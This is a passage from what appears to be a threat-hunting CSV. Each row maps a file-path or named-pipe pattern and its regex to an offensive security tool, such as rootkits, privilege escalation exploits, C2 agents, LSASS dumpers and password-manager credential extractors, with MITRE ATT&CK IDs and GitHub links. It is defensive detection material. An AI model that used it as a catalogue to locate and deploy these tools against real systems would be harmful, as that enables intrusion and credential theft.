TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\\\*\\*\\Get-FileLockProcess.ps1*",".{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}\\\\Get\-FileLockProcess\.ps1.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*\\\\*\\share\\test.bin*",".{0,1000}\\\\\\\\.{0,1000}\\\\share\\\\test\.bin.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\\\\.\\*\\*\\*\\smile.txt\*",".{0,1000}\\\\\\\\\.\\\\.{0,1000}\\\\.{0,1000}\\\\.{0,1000}\\\\smile\.txt\\.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*\\\\.\\Cronos*",".{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\\\\.\\pipe\\coerced\\pipe\\spoolss*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*\\\\.\\pipe\\coerced\\pipe\\srvsvc*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*\\\\.\\pipe\\innocent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\innocent.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\ioring_in*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_in.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 
- TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\ioring_out*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_out.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\mal*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*\\\\.\\pipe\\merlin*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","named pipe","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\\\\.\\pipe\\warpzone8*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\\\\{attacker_ip}\\*",".{0,1000}\\\\\\\\\{attacker_ip\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\\\\{coerce_to}\\*",".{0,1000}\\\\\\\\\{coerce_to\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\\\\127.0.0.1\\pipe\\warpzone8*",".{0,1000}\\\\\\\\127\.0\.0\.1\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\\127.0.0.1\c$*",".{0,1000}\\\\127\.0\.0\.1\\c\$.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\\ataDmargorP\\:C*",".{0,1000}\\\\ataDmargorP\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\c$\Windows\Temp\*.dmp*",".{0,1000}\\\\c\$\\Windows\\Temp\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\\DCSC_stdInPipe*",".{0,1000}\\\\DCSC_stdInPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*\\DCSC_stdOutPipe*",".{0,1000}\\\\DCSC_stdOutPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" 
"*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation
Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\Device\\StealToken*",".{0,1000}\\\\Device\\\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\\Driver\\Nidhogg*",".{0,1000}\\\\Driver\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\GetWebDAVStatus.exe*",".{0,1000}\\\\GetWebDAVStatus\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\\localhost/pipe/petit\*",".{0,1000}\\\\localhost\/pipe\/petit\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\\pipe\\DAV RPC SERVICE*",".{0,1000}\\\\pipe\\\\DAV\sRPC\sSERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\\pipe\\petit\\pipe\\srvsvc*",".{0,1000}\\\\pipe\\\\petit\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\\PPLmedic\\ntstuff*",".{0,1000}\\\\PPLmedic\\\\ntstuff.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\\saint.jar*",".{0,1000}\\\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\\stub\\COFFLoader.bin*",".{0,1000}\\\\stub\\\\COFFLoader\.bin.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\\swodniW\\:C*",".{0,1000}\\\\swodniW\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\Users\\Fantastic\\Desktop\\DEMO\\plugins\\scripts\\*",".{0,1000}\\\\Users\\\\Fantastic\\\\Desktop\\\\DEMO\\\\plugins\\\\scripts\\\\.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\1$a$$.exe*",".{0,1000}\\1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*\1.Encrypt_shellcode*",".{0,1000}\\1\.Encrypt_shellcode.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" 
"*\10m_usernames.txt*",".{0,1000}\\10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "*\127.0.0.1/pipe/coerced*",".{0,1000}\\127\.0\.0\.1\/pipe\/coerced.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\1password\app\FindsecondPID1password.h*",".{0,1000}\\1password\\app\\FindsecondPID1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappEntries1.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappEntries2.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from 
different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getCreds1passwordappMaster.h*",".{0,1000}\\1password\\app\\getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\app\getProcUAC1password.h*",".{0,1000}\\1password\\app\\getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\plugin\getCreds1passwordplugin.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\1password\plugin\getCreds1passwordplugin2.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\2fac5c2a114c7896c33fb2b0a9f6443d\*",".{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*",".{0,1000}\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*\AbandonedCOMKeys.*",".{0,1000}\\AbandonedCOMKeys\..{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\ABPTTS-master*",".{0,1000}\\ABPTTS\-master.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*\accounts_passdontexpire.txt*",".{0,1000}\\accounts_passdontexpire\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\AD_Miner-*",".{0,1000}\\AD_Miner\-.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","0","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*\ADAudit.ps1*",".{0,1000}\\ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - 
TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*\ADCollector.exe*",".{0,1000}\\ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 